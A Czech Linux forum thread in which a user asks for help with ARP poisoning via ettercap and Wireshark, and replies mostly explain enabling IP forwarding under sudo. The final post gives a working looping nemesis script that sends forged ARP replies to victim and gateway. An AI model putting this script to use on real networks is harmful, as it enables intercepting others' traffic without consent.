Arp poisoning

google nic? zacit muzes s ettercap

Do you like what you see? No? Well, bloody look harder.

29.10.2009 16:49 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

Dekuji, prave to zkousim. Podle tohoto navodu: http://openmaniak.com/ettercap_arp.php Data zachytavam Wiresharkem, jenze mi to funguje tak na pul. "Otraveny" host posle pozadavek (treba na nacteni stranky) na router, ja ho ale u sebe nevidim. Vidim pouze odpoved, ktera prijde.

Je to jako kdyby host nebyl otraveny a posilal data spravne na router a router byl otraveny a posilal data ke mne. Je neco takoveho mozne? V cem muze byt chyba?

A jeste bych se chtel zeptat, jestli je toto ok:

$ cat /proc/sys/net/ipv4/ip_forward
0

29.10.2009 17:22 Cubic | skóre: 24 | blog: obcasne_vyplody | Essex
Rozbalit Rozbalit vše Re: Arp poisoning

nevim, jen jsem si vzpomnel ze to je v ettercapu mozne ale predpokladam ze

echo 1 > /proc/sys/net/ipv4/ip_forward
potreba bude

Do you like what you see? No? Well, bloody look harder.

29.10.2009 17:33 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

A nevite proc nejde toto:

$ sudo echo 1 > /proc/sys/net/ipv4/ip_forward
bash: /proc/sys/net/ipv4/ip_forward: Permission denied

Pokud se ale prepnu na roota pres su tak to jde, ale ja bych to rad umistil do skriptu.

29.10.2009 17:51 Bilbo | skóre: 29
Rozbalit Rozbalit vše Re: Arp poisoning

Protoze to provede prikaz "echo 1" pod rootem a jeho vystup (uz pod normalnim uzivatelem) presmeruje do /proc/sys/net/ipv4/ip_forward

Musi se to ouvozovkovat:

sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'

pak se to spusti spravne cele jako prikaz pod rootem

Big brother is not watching you anymore. Big Brother is telling you how to live...

8.11.2009 09:32 Marek Adamovsky
Rozbalit Rozbalit vše Re: Arp poisoning

Stale nic:

$ sudo 'echo 1 > /proc/sys/net/ipv4/ip_forward'
sudo: echo 1 > /proc/sys/net/ipv4/ip_forward: command not found

8.11.2009 11:30 l4m4
Rozbalit Rozbalit vše Re: Arp poisoning

sudo takhle nefunguje (tj. nenechává napsané interpretovat shellem), protože by to citelně zkomplikovalo omezení, když má uživatel povoleno spouštět jen určité věci. sudo prostě napsané exec-ne.

a) spouštěj to v rootovském shellu

b) dej to do skriptu, ten pak můžeš spouštět přes sudo

8.11.2009 15:20 Bilbo | skóre: 29
Rozbalit Rozbalit vše Re: Arp poisoning

No, pokud je sudo "neomezene" (osobne sudo nepouzivam, jen su, takze ho moc neznam, ale tusim nejak takhle je nastaveno treba ve vychozi konfiguraci Ubuntu), tak i s tim shellem by to slo, asi by se muselo pouzit neco jako:

sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'

nebo

sudo "sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'"

Nebo ten skript :)

Big brother is not watching you anymore. Big Brother is telling you how to live...

Zdravim, je to vcelku "trivialni" utok a take je pomerne dobre popsany, hezky je to popsane v knize Linux hackerské útoky.

Jeden z pouzivanych nastroju je nemesis, najdete ho alespon v debianu primo v repositari.

nemesis - TCP/IP Packet Injection Suite

Jeste prikladam skriptik jak to udelat...

----

#!/bin/sh

SOURCEMAC=""
SOURCEIP=""

DESTMAC=""
DESTIP=""

MYMAC=""
MYIP=""

while true
do
# 1
/usr/bin/nemesis arp -v -r -d eth0 -S $DESTIP -D $SOURCEIP -h $MYMAC -m $SOURCEMAC -H $MYMAC -M $SOURCEMAC

# 2
/usr/bin/nemesis arp -v -r -d eth0 -S $SOURCEIP -D $DESTIP -h $MYMAC -m $DESTMAC -H $MYMAC -M $DESTMAC
echo "Injecting ... "
sleep 10
done
----

Dotaz: Arp poisoning

Odpovědi